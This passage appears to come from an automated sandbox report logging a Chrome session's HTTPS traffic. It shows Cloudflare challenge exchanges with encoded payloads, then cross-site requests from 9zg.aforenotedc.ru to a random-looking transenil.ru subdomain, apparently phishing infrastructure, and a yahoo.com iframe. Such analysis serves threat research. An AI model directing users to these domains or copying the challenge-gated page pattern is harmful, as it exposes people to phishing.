                                                                                  Data Ascii: cCxwvFBsrLzwzPE88LDwPVFBLXGRoHBx0a3xcUIfgf5SUTK+cp6+fsKioF7i4v7/A2Izv3OREv+Tc7NwNBGT8EQkM3BUZHN0BNOz8NURMJVFVTQxZTV18ZXktTH2EkVyhiYj0maWdfL2pqMC5uMzQ4b3NneXlRezl+akBAfn5EeIVdd0uJYXdQiouDTZJoaVOWbYdZlpZcnJxgi2Cbn5tjpaJoZ6mBn26qq5uksZ50dLV4r7m4t7d5vH+VgcC/t
                                                                                  2024-10-02 15:49:51 UTC1369INData Raw: 36 43 51 33 36 41 77 54 2b 34 75 51 45 38 64 62 6f 32 68 6b 58 2b 4e 59 61 33 2f 51 6b 49 52 34 42 4a 53 58 6c 33 42 73 6f 36 79 6f 4c 4b 2b 67 66 4d 78 34 45 46 50 49 75 4c 44 63 39 4f 44 63 4d 45 7a 73 33 44 54 59 6c 4f 6b 49 36 4d 69 6c 43 4f 45 63 71 53 7a 39 4c 45 44 38 54 53 68 41 6b 46 7a 6f 55 53 31 41 34 52 7a 51 78 50 55 74 45 50 31 74 58 4a 47 6c 44 52 7a 6b 6d 53 53 73 2f 4a 6d 73 70 5a 6b 31 78 51 30 31 6f 55 55 31 51 54 56 6c 6e 63 6c 74 33 64 46 47 46 58 32 4e 56 52 57 56 48 58 46 61 48 52 59 4a 70 6a 55 70 70 68 47 31 55 62 47 6c 31 67 35 70 33 6b 35 42 35 6f 58 74 2f 63 57 53 42 5a 48 53 69 69 6f 6d 62 6d 49 69 42 68 57 6d 72 6d 37 4e 78 73 49 4b 33 74 35 53 4d 69 61 75 79 65 49 78 2f 6f 6e 79 7a 75 4a 36 76 6e 4a 7a 44 70 34 76 47 77 73
                                                                                  Data Ascii: 6CQ36AwT+4uQE8dbo2hkX+NYa3/QkIR4BJSXl3Bso6yoLK+gfMx4EFPIuLDc9ODcMEzs3DTYlOkI6MilCOEcqSz9LED8TShAkFzoUS1A4RzQxPUtEP1tXJGlDRzkmSSs/JmspZk1xQ01oUU1QTVlnclt3dFGFX2NVRWVHXFaHRYJpjUpphG1UbGl1g5p3k5B5oXt/cWSBZHSiiombmIiBhWmrm7NxsIK3t5SMiauyeIx/onyzuJ6vnJzDp4vGws


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.449777104.18.94.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:52 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:52 UTC349INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 02 Oct 2024 15:49:52 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 7
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: C7MB5jG+GDzU/SyAdfP5TeYAizGsAF6hsVk=$0hOIHa0pa3xlXDBh
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d84b9d81c481-EWR
                                                                                  2024-10-02 15:49:52 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                  Data Ascii: invalid


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.449781104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:50:05 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 34211
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: 77bf10bc9e9db0f
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:50:05 UTC16384OUTData Raw: 76 5f 38 63 63 35 64 38 31 35 39 63 65 35 31 38 35 64 3d 6b 52 2d 4b 48 69 68 73 74 42 74 30 64 62 25 32 62 6d 71 6d 45 42 2d 68 69 68 66 6d 69 4b 64 32 53 51 68 44 6d 68 35 32 62 73 6d 79 6d 69 49 32 53 70 68 24 6d 50 31 39 6d 68 74 66 35 68 59 6d 4d 49 43 51 6d 4d 4b 69 39 6c 6d 61 49 69 6f 6d 39 55 67 73 6d 42 65 6b 74 68 6f 75 30 2d 6d 6f 6d 6b 49 49 68 7a 39 39 30 69 42 6d 44 68 35 2d 64 6d 70 59 7a 43 66 34 62 6d 32 32 6d 67 58 4b 70 64 68 79 42 42 6d 6d 70 2b 6d 6b 74 4b 52 52 4b 62 64 70 6d 69 72 2b 70 4b 61 57 46 65 2d 6d 61 4b 4b 53 36 31 34 6e 53 75 53 6d 53 65 2d 53 30 6b 66 68 70 58 47 66 6d 4e 39 49 73 62 64 35 54 2d 24 31 75 4b 30 35 6d 43 67 4d 58 65 54 39 62 30 5a 47 73 6d 69 67 7a 67 50 6b 4d 61 4d 4c 4a 64 47 66 52 4b 34 34 30 44 55 76
                                                                                  Data Ascii: v_8cc5d8159ce5185d=kR-KHihstBt0db%2bmqmEB-hihfmiKd2SQhDmh52bsmymiI2Sph$mP19mhtf5hYmMICQmMKi9lmaIiom9UgsmBekthou0-momkIIhz990iBmDh5-dmpYzCf4bm22mgXKpdhyBBmmp+mktKRRKbdpmir+pKaWFe-maKKS614nSuSmSe-S0kfhpXGfmN9Isbd5T-$1uK05mCgMXeT9b0ZGsmigzgPkMaMLJdGfRK440DUv
                                                                                  2024-10-02 15:50:05 UTC16384OUTData Raw: 44 33 68 42 66 6d 32 6d 68 54 70 6d 30 52 52 31 6d 4b 52 47 69 6d 79 32 2d 71 6d 78 6d 6d 6d 42 58 62 32 69 69 34 4a 34 53 68 52 32 6d 6d 34 63 46 43 62 51 6d 55 4b 68 2d 2b 6d 43 41 6e 6f 4b 45 49 34 30 6e 75 6d 39 47 68 58 66 7a 6d 69 6d 42 4b 30 33 32 6b 49 68 6d 68 52 6d 39 6d 68 41 6d 67 78 50 6d 43 54 32 78 6d 38 4b 30 52 6d 36 6d 39 49 6d 32 68 35 4b 2b 45 68 64 6d 73 67 50 4b 53 53 68 33 6d 53 6d 68 72 68 34 6d 4e 6d 6d 53 6d 65 6d 6d 32 43 76 32 42 4b 69 6f 30 52 68 24 74 75 49 30 4c 66 61 43 71 32 69 2b 6d 4d 6d 30 6c 53 6c 6d 75 6d 42 6d 30 6d 68 5a 6d 38 4b 62 55 68 48 6d 70 49 6d 51 6d 74 6d 67 49 68 6d 6d 68 6d 62 4b 68 4b 68 71 32 2d 31 69 53 6d 6e 6d 38 71 69 59 6d 4f 52 45 6d 69 2d 6e 76 49 70 6d 53 49 30 75 6d 79 6d 53 32 68 2b 6d 75 6d
                                                                                  Data Ascii: D3hBfm2mhTpm0RR1mKRGimy2-qmxmmmBXb2ii4J4ShR2mm4cFCbQmUKh-+mCAnoKEI40num9GhXfzmimBK032kIhmhRm9mhAmgxPmCT2xm8K0Rm6m9Im2h5K+EhdmsgPKSSh3mSmhrh4mNmmSmemm2Cv2BKio0Rh$tuI0LfaCq2i+mMm0lSlmumBm0mhZm8KbUhHmpImQmtmgIhmmhmbKhKhq2-1iSmnm8qiYmOREmi-nvIpmSI0umymS2h+mum
                                                                                  2024-10-02 15:50:05 UTC1443OUTData Raw: 64 75 6d 4d 51 69 76 45 76 35 79 34 78 77 62 42 6d 65 67 77 33 6f 4f 33 73 4b 42 4b 2d 79 67 69 6d 45 58 39 78 24 76 57 6e 65 42 31 6d 68 6d 66 38 53 78 30 7a 2b 57 7a 62 33 61 75 6d 54 6c 42 6c 6d 71 6d 2d 35 52 5a 62 45 49 6f 6d 62 53 6d 53 6d 73 53 69 31 6d 6f 4b 48 4b 43 51 77 4f 39 61 55 64 69 6f 45 6d 32 32 68 75 4b 61 30 76 65 62 54 77 42 32 2d 2b 70 78 30 36 70 36 52 39 49 68 36 4b 47 49 53 49 69 42 2d 4e 36 33 76 43 58 72 52 36 69 4d 77 6c 6d 61 49 34 36 30 4a 42 48 6c 41 33 65 49 46 38 4e 24 77 37 74 46 79 4e 35 52 68 52 46 66 4e 4a 61 76 5a 36 65 4a 6f 67 68 6b 6f 4b 38 53 78 30 76 58 58 50 4e 74 69 69 52 39 79 37 71 30 36 73 4f 4f 64 70 6d 4d 57 78 5a 5a 4e 69 4d 47 57 79 64 38 5a 7a 2d 35 38 6b 74 44 4d 6c 43 38 70 31 32 47 2d 5a 4b 6d 2b 31
                                                                                  Data Ascii: dumMQivEv5y4xwbBmegw3oO3sKBK-ygimEX9x$vWneB1mhmf8Sx0z+Wzb3aumTlBlmqm-5RZbEIombSmSmsSi1moKHKCQwO9aUdioEm22huKa0vebTwB2-+px06p6R9Ih6KGISIiB-N63vCXrR6iMwlmaI460JBHlA3eIF8N$w7tFyN5RhRFfNJavZ6eJoghkoK8Sx0vXXPNtiiR9y7q06sOOdpmMWxZZNiMGWyd8Zz-58ktDMlC8p12G-ZKm+1
                                                                                  2024-10-02 15:50:05 UTC1291INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:50:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4476
                                                                                  Connection: close
                                                                                  cf-chl-out: JUmW5OgFTamVfIr7JguzH7ayCYmlDJswyY8eObilb6aDLLgztLRnXWv1ZBQgZXu5+kJPWS1/9htp7Civq7sKVDfthu5zSpmqZqfqIZReMEItrRwfC0Nys30=$43eBHfv3EhLOha7/
                                                                                  cf-chl-out-s: 6WBzJn9am2pZJeNI1ev2G3z5mhEq+m6XN6CbC3haIvD32TbkRorKuBge28n8IShC2+Yt5MVUqPW4qPKt1INZDvKaohhWJM4MOJrQCXVgmZdhw+PWEL9C5RLPegU5CiE1/H7NKfBAQMUqptcMnDKY4xXW4yAACb3D/3DuD8Gmlg7L5k3FXGn6z5FyUs2k9c0Js7WKo0jMP23mfLcUjSmDYP/hSziZiP0Qs+8bmXsaTo1wTSGNyCvPzk0Lrlh/IvRMMxhUAZRNC9xEEH8G3FqfTBB9pkSHFw4LZYUttjPnhpx+qW9EP32XOc6UR39OzfiYDUMC0m8g0Xda6H9ZX81usZoNyfvGT+z9bsgGWOj+WGWAkpx0ZWGaeltcdKIIIXpQ27ldfc9Ge70Cizx2/A0iR74KNasJ+FHTuuIAxFpNlfNNP9MxOtsFe29v6zZ81yZKcqM1wu+k1YKnE3zy1ZZ4XpK1GLE+Zn5cSdMVxGCSURRAO9872e8Hjg+uoJ0hMYybnw/n0ivQm1IMfJ0ccK0JOQ0N+x/By1XLYvVH/E/7ZAusmPy62mUXZTGG07a9tCjdTRncjPScSxQ7sgKpkpEhQBNWaja4Uc/DePWYJXdcIxsXzD36DUta+Q1LZyi4oWRhblYIAXN1biALGayLyWYvQAmDKI/MUeNGcQWFcfVSFdtOZgpc83fqMqD8DgKE1whIV0uDZmR/p/DAxJT8SLdDsKYJbxfAYTKe23HQKZFZqHDZIhgQYR32w36Maro4ftkF7moRz4GItTVfYbPpibCPNVYYIqSoBwzQfJr1iU2FpbZp4ZHlbKlgVjd4pU2B3+WsDhkM3b45tokdgCPI/pWIY3z1a7OCwQ3euQyIWUahFFwEdFiRrKUNuPhxR0Cm0Nn6TGWWuyQqg8gPgTcRaPL16wY=$IgYHAZ3zhGW/NgYB
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d89aee7f5e5f-EWR
                                                                                  2024-10-02 15:50:05 UTC78INData Raw: 6e 5a 65 52 6a 4b 53 66 6f 35 65 55 6b 70 75 68 6d 71 79 58 68 70 32 6d 69 34 62 47 6b 61 47 7a 7a 71 71 75 32 72 44 53 71 5a 32 5a 6d 4c 36 36 6f 4e 66 42 73 4f 44 58 73 39 72 49 7a 62 79 6e 7a 4e 48 41 72 65 48 6f 72 37 6a 59 37 73
                                                                                  Data Ascii: nZeRjKSfo5eUkpuhmqyXhp2mi4bGkaGzzqqu2rDSqZ2ZmL66oNfBsODXs9rIzbynzNHAreHor7jY7s
                                                                                  2024-10-02 15:50:05 UTC1369INData Raw: 76 55 38 4e 4c 48 31 39 37 65 37 73 37 65 34 74 7a 69 36 73 48 62 2b 74 58 47 32 65 49 51 44 73 33 31 7a 4e 59 59 46 39 67 54 35 4e 7a 78 44 78 62 79 39 65 6f 5a 49 2f 33 30 47 69 66 6e 45 2f 6e 73 4a 4f 76 35 4d 43 7a 79 2f 42 58 39 44 41 59 53 4b 50 59 4f 50 53 33 35 50 41 77 7a 4a 42 6f 66 41 52 73 30 49 53 49 69 42 7a 67 57 4a 79 41 50 48 6c 45 67 48 69 46 57 4e 44 51 53 4d 77 34 73 47 54 74 65 4f 6a 30 30 4d 31 67 6d 4a 6b 4e 61 49 56 6f 6d 52 55 56 50 49 6b 74 74 58 6e 4d 73 62 57 31 76 4c 33 4e 54 5a 6b 6c 54 4f 54 70 30 63 6a 35 62 54 33 4f 49 59 34 5a 33 56 32 31 48 5a 6e 6c 66 57 6e 78 68 54 48 35 73 66 32 64 6f 65 6f 39 77 56 6c 6c 61 55 6e 61 62 6d 6e 4b 54 68 32 42 38 61 47 4f 54 69 48 35 6e 68 35 31 6a 6b 4b 42 6d 71 33 2b 6f 74 61 71 6b 72
                                                                                  Data Ascii: vU8NLH197e7s7e4tzi6sHb+tXG2eIQDs31zNYYF9gT5NzxDxby9eoZI/30GifnE/nsJOv5MCzy/BX9DAYSKPYOPS35PAwzJBofARs0ISIiBzgWJyAPHlEgHiFWNDQSMw4sGTteOj00M1gmJkNaIVomRUVPIkttXnMsbW1vL3NTZklTOTp0cj5bT3OIY4Z3V21HZnlfWnxhTH5sf2doeo9wVllaUnabmnKTh2B8aGOTiH5nh51jkKBmq3+otaqkr
                                                                                  2024-10-02 15:50:05 UTC1369INData Raw: 51 30 62 37 31 2f 65 48 59 38 65 6f 48 41 77 44 66 39 77 63 4e 2b 38 73 44 42 4f 63 51 36 68 54 56 43 4f 30 4d 43 42 6a 70 48 64 7a 67 4a 53 4c 66 4a 41 49 59 34 2f 6b 63 4a 69 50 6f 4c 53 50 72 37 42 41 57 43 69 41 6b 4d 69 4d 6f 4a 6a 59 31 4b 44 67 30 46 76 77 65 51 44 35 41 41 45 63 64 47 6a 64 48 4c 79 59 74 54 7a 4d 4e 53 6b 39 4e 4a 56 4e 55 55 6c 52 65 57 30 64 59 4f 31 59 63 48 56 78 55 55 46 77 2b 59 6a 6b 32 4a 57 46 6d 4c 54 39 74 56 47 42 75 5a 6c 59 31 63 33 46 30 4e 57 56 65 55 6c 59 2f 65 6c 52 38 52 57 35 45 63 34 52 79 62 46 6d 43 67 55 74 78 51 34 61 4b 6a 48 39 33 6a 6d 71 61 6a 59 2b 55 69 49 79 49 61 6e 2b 53 6d 36 43 50 6f 34 65 63 65 71 57 6a 6d 47 53 64 70 6e 70 72 72 4b 71 73 70 4c 4f 59 63 58 4f 71 6d 62 4f 32 72 35 43 4f 67 4c
                                                                                  Data Ascii: Q0b71/eHY8eoHAwDf9wcN+8sDBOcQ6hTVCO0MCBjpHdzgJSLfJAIY4/kcJiPoLSPr7BAWCiAkMiMoJjY1KDg0FvweQD5AAEcdGjdHLyYtTzMNSk9NJVNUUlReW0dYO1YcHVxUUFw+Yjk2JWFmLT9tVGBuZlY1c3F0NWVeUlY/elR8RW5Ec4RybFmCgUtxQ4aKjH93jmqajY+UiIyIan+Sm6CPo4eceqWjmGSdpnprrKqspLOYcXOqmbO2r5COgL
                                                                                  2024-10-02 15:50:05 UTC1369INData Raw: 36 4f 6a 7a 42 4f 72 49 36 4f 44 37 33 67 50 6f 44 2b 50 77 30 50 54 58 43 2b 6e 37 37 51 76 78 2b 4e 77 46 46 77 37 67 33 79 41 4c 43 53 73 74 44 69 49 66 36 51 34 6c 42 53 77 67 46 53 67 34 46 52 6f 56 44 78 72 37 47 52 59 62 44 78 59 34 4d 69 59 52 52 7a 4d 6f 46 51 51 34 48 45 74 50 50 55 74 54 4d 7a 51 50 54 79 55 34 45 7a 6c 52 56 52 68 50 53 54 34 63 52 54 52 4f 58 47 4e 6d 51 6c 35 47 58 30 68 42 59 30 46 51 61 45 51 72 59 6d 39 5a 54 46 51 30 65 32 68 6e 57 31 46 35 58 58 56 38 67 48 46 36 56 44 2b 43 57 57 31 32 61 49 52 37 6b 58 4f 47 63 6f 31 77 66 35 4e 35 68 57 32 48 61 5a 5a 74 6e 36 4b 4e 6d 48 6c 76 68 33 57 46 64 59 56 34 67 59 43 49 66 71 74 72 6d 6d 79 72 74 71 43 45 6d 5a 6d 57 72 34 32 35 6c 35 32 34 75 36 4b 34 74 4c 36 66 6c 73 4f
                                                                                  Data Ascii: 6OjzBOrI6OD73gPoD+Pw0PTXC+n77Qvx+NwFFw7g3yALCSstDiIf6Q4lBSwgFSg4FRoVDxr7GRYbDxY4MiYRRzMoFQQ4HEtPPUtTMzQPTyU4EzlRVRhPST4cRTROXGNmQl5GX0hBY0FQaEQrYm9ZTFQ0e2hnW1F5XXV8gHF6VD+CWW12aIR7kXOGco1wf5N5hW2HaZZtn6KNmHlvh3WFdYV4gYCIfqtrmmyrtqCEmZmWr425l524u6K4tL6flsO
                                                                                  2024-10-02 15:50:05 UTC291INData Raw: 73 73 4a 7a 2b 7a 55 41 2f 55 4d 45 42 4d 44 43 42 51 4b 46 41 2f 65 47 74 38 43 46 78 37 67 47 2b 45 6a 45 79 67 6a 42 41 30 4c 42 4f 67 51 2f 68 4d 6b 42 43 34 43 41 79 6b 79 4d 67 59 7a 43 52 67 4f 47 43 38 54 4f 43 67 56 46 44 77 39 4c 41 4d 6d 42 6a 77 71 52 41 6f 6f 43 79 39 4a 4c 6a 4d 52 45 53 30 31 4f 30 35 57 55 69 70 54 49 44 51 79 59 57 64 52 51 32 77 70 4b 69 63 70 52 47 68 45 62 79 39 4a 54 45 6c 75 4d 47 35 57 52 32 56 36 62 58 4a 52 54 46 64 34 59 45 39 39 66 58 5a 47 52 48 56 46 67 6b 74 6b 59 57 39 70 61 57 64 65 59 6c 56 75 6c 31 71 4e 63 56 6d 4b 61 33 4a 65 6a 70 56 39 70 70 46 6d 69 6d 65 56 70 59 6d 74 6d 57 36 4c 73 4a 32 79 67 49 36 6d 6f 4b 65 76 63 36 53 74 76 59 32 36 77 4a 61 2f 70 48 79 64 6b 5a 32 30 77 6f 71 67 6a 63 37 48
                                                                                  Data Ascii: ssJz+zUA/UMEBMDCBQKFA/eGt8CFx7gG+EjEygjBA0LBOgQ/hMkBC4CAykyMgYzCRgOGC8TOCgVFDw9LAMmBjwqRAooCy9JLjMRES01O05WUipTIDQyYWdRQ2wpKicpRGhEby9JTEluMG5WR2V6bXJRTFd4YE99fXZGRHVFgktkYW9paWdeYlVul1qNcVmKa3JejpV9ppFmimeVpYmtmW6LsJ2ygI6moKevc6StvY26wJa/pHydkZ20woqgjc7H


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.449782104.18.94.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:50:05 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:50:06 UTC349INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 02 Oct 2024 15:50:06 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 7
                                                                                  Connection: close
                                                                                  cf-chl-out: HLIeyMSGeni+wLdfHMZJXhA4o+LyvMXN8UA=$6UXUN97Om8TwpcnC
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d89fdac4438c-EWR
                                                                                  2024-10-02 15:50:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                  Data Ascii: invalid


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.449783188.114.97.34433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:50:06 UTC677OUTGET /992955768393598TcoooKWMQFRRVTWFRRYLUCPRWPCDYMYFKPHJKQLEDFPAIMQBMIMJDUCSR HTTP/1.1
                                                                                  Host: 3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://9zg.aforenotedc.ru
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://9zg.aforenotedc.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:50:07 UTC705INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:50:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35erd0lQs3ej8WjlsVOZMD3NbaWCCF0KGRgmLJuIZ%2F4sCeqU4an4mi3kcZ7s3yEa7odOcTTFS2i%2BG6%2FBqpxbK91J0rGxCVDzWshbf6TchYSqqhuslH2c78hUtlasE5DVIi20OOgWCcjQY7Wu2f%2FjjXcGuss9oBme0xgH5BD8hG%2BEo22kTrRmCSoBknSN%2F57ePLqne6Jts2x3%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Speculation-Rules: "/cdn-cgi/speculation"
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d8a05b5b443e-EWR
                                                                                  2024-10-02 15:50:07 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                  Data Ascii: 11
                                                                                  2024-10-02 15:50:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.449785188.114.97.34433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:50:07 UTC467OUTGET /992955768393598TcoooKWMQFRRVTWFRRYLUCPRWPCDYMYFKPHJKQLEDFPAIMQBMIMJDUCSR HTTP/1.1
                                                                                  Host: 3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:50:08 UTC699INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:50:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lV3cfAGunmWAchEJE7q%2BuTRYTEZkSAoDLJmeRAHvooZyfmj86lqSBpzzYO7AAyB0PatUqeAljm6fcn%2FCdRTmcW6a9luWEputheRyM8zWzMCOJro8rFHx5KLQXom1tKNYBSizshHfXDPJEaQyKyTqFfOsNYfpIYo3BAwW8dHEt2FriNAsvISPcV0kda9sPa6W%2FOdY%2F9xxxTfxjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Speculation-Rules: "/cdn-cgi/speculation"
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d8aa689d4339-EWR
                                                                                  2024-10-02 15:50:08 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                  Data Ascii: 11
                                                                                  2024-10-02 15:50:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.44978498.137.11.1634433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:50:07 UTC694OUTGET / HTTP/1.1
                                                                                  Host: yahoo.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-User: ?1
                                                                                  Sec-Fetch-Dest: iframe
                                                                                  Referer: https://9zg.aforenotedc.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:50:07 UTC428INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Wed, 02 Oct 2024 15:50:07 GMT
                                                                                  Connection: keep-alive
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Server: ATS
                                                                                  Cache-Control: no-store, no-cache
                                                                                  Content-Type: text/html
                                                                                  Content-Language: en
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Location: https://www.yahoo.com/
                                                                                  Content-Length: 8
                                                                                  2024-10-02 15:50:07 UTC8INData Raw: 72 65 64 69 72 65 63 74
                                                                                  Data Ascii: redirect


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.44978687.248.119.2524433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:50:08 UTC698OUTGET / HTTP/1.1
                                                                                  Host: www.yahoo.com
                                                                                  Connection: keep-alive
                                                                                  Upgrade-Insecure-Requests: 1
